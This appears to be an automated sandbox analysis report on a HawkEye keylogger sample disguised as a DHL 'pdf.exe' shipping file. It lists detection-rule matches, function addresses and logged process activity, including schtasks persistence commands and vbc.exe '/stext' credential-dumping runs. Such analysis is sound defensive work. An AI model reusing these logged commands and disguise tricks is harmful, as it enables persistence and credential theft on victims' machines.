            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7de834a.4.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 24.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 24.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65890.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65890.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.4291990.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.41f5950.3.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90000.6.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65bd5.1.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90000.6.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90345.5.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5024860.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5024860.4.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5024860.4.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.4f54640.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.4f54640.2.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.4f54640.2.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 00000000.00000002.290657795.000000000536D000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000007.00000002.528296707.0000000007D90000.00000004.00020000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 00000007.00000002.517940589.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000000.00000002.289479199.0000000004E84000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2172, type: MEMORYSTRMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2960, type: MEMORYSTRMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_019A10700_2_019A1070
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_019A23E10_2_019A23E1
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_019A32300_2_019A3230
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_019A04700_2_019A0470
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_019A41380_2_019A4138
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_019A41290_2_019A4129
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_019A31590_2_019A3159
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_019A50080_2_019A5008
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_019A58300_2_019A5830
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_019A58400_2_019A5840
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_019A13730_2_019A1373
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_019A5A280_2_019A5A28
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_019A55D30_2_019A55D3
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_019A55E00_2_019A55E0
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_019A842F0_2_019A842F
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_019A54580_2_019A5458
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_019A54480_2_019A5448
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_019A84400_2_019A8440
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_019A0FB90_2_019A0FB9
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_058C75C80_2_058C75C8
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_058C75D80_2_058C75D8
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 0_2_058C4B4C0_2_058C4B4C
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016920687_2_01692068
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016904D87_2_016904D8
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016954B87_2_016954B8
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016999207_2_01699920
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016978687_2_01697868
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016938E67_2_016938E6
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01690C487_2_01690C48
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01696C207_2_01696C20
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01699F807_2_01699F80
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016941687_2_01694168
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016941787_2_01694178
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016935687_2_01693568
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016935637_2_01693563
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016905627_2_01690562
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016945287_2_01694528
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_0169053B7_2_0169053B
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016945197_2_01694519
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016905ED7_2_016905ED
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016905A67_2_016905A6
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016999107_2_01699910
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016929E97_2_016929E9
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016929F87_2_016929F8
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016939D77_2_016939D7
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016939817_2_01693981
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016958787_2_01695878
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016978587_2_01697858
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016948E07_2_016948E0
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016948D07_2_016948D0
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_016958887_2_01695888
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01693B607_2_01693B60
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01693B1E7_2_01693B1E
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01693BF17_2_01693BF1
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01693BCE7_2_01693BCE
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01693A777_2_01693A77
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01693A027_2_01693A02
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01693ADD7_2_01693ADD
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01693AAA7_2_01693AAA
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01693D407_2_01693D40
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01693DDD7_2_01693DDD
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01693DA07_2_01693DA0
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01693C737_2_01693C73
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01690C357_2_01690C35
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01693C1D7_2_01693C1D
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01691F617_2_01691F61
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01693E757_2_01693E75
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01698E287_2_01698E28
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01696E087_2_01696E08
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_01693E1A7_2_01693E1A
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_060562B87_2_060562B8
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_060543107_2_06054310
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_06054C007_2_06054C00
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_0605FBD07_2_0605FBD0
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_0605C2817_2_0605C281
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_0605C2C87_2_0605C2C8
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_060590807_2_06059080
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_060590907_2_06059090
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeCode function: 7_2_06053FC07_2_06053FC0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_004063BB11_2_004063BB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_0044900F11_2_0044900F
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_004042EB11_2_004042EB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_0041428111_2_00414281
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_0041029111_2_00410291
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_0041562411_2_00415624
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_0041668D11_2_0041668D
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_0040477F11_2_0040477F
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_0040487C11_2_0040487C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_0043589B11_2_0043589B
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_0043BA9D11_2_0043BA9D
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_0043FBD311_2_0043FBD3
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 24_2_00404DE524_2_00404DE5
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 24_2_00404E5624_2_00404E56
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 24_2_00404EC724_2_00404EC7
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 24_2_00404F5824_2_00404F58
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 24_2_0040BF6B24_2_0040BF6B
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00415F19 appears 34 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 0044468C appears 36 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004162C2 appears 87 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00412084 appears 39 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00444B90 appears 36 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 0041607A appears 66 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004083D6 appears 32 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 11_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,11_2_0040978A
            Source: DHL_AWB 518877882999_887755468_pdf.exeBinary or memory string: OriginalFilename vs DHL_AWB 518877882999_887755468_pdf.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000003.269608946.0000000001772000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKeyedHashAlgorit.exeD vs DHL_AWB 518877882999_887755468_pdf.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameReborn Stub.exe" vs DHL_AWB 518877882999_887755468_pdf.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs DHL_AWB 518877882999_887755468_pdf.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000000.276423081.0000000000F6A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameKeyedHashAlgorit.exeD vs DHL_AWB 518877882999_887755468_pdf.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.517940589.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameReborn Stub.exe" vs DHL_AWB 518877882999_887755468_pdf.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exeBinary or memory string: OriginalFilenameKeyedHashAlgorit.exeD vs DHL_AWB 518877882999_887755468_pdf.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: cmsyNzu.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: DHL_AWB 518877882999_887755468_pdf.exeVirustotal: Detection: 33%
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeFile read: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeJump to behavior
            Source: DHL_AWB 518877882999_887755468_pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe 'C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe'
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cmsyNzu' /XML 'C:\Users\user\AppData\Local\Temp\tmp70BF.tmp'
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess created: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp1B0D.tmp'
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp11A3.tmp'
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cmsyNzu' /XML 'C:\Users\user\AppData\Local\Temp\tmp70BF.tmp'Jump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess created: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp1B0D.tmp'Jump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp11A3.tmp'Jump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeFile created: C:\Users\user\AppData\Roaming\cmsyNzu.exeJump to behavior
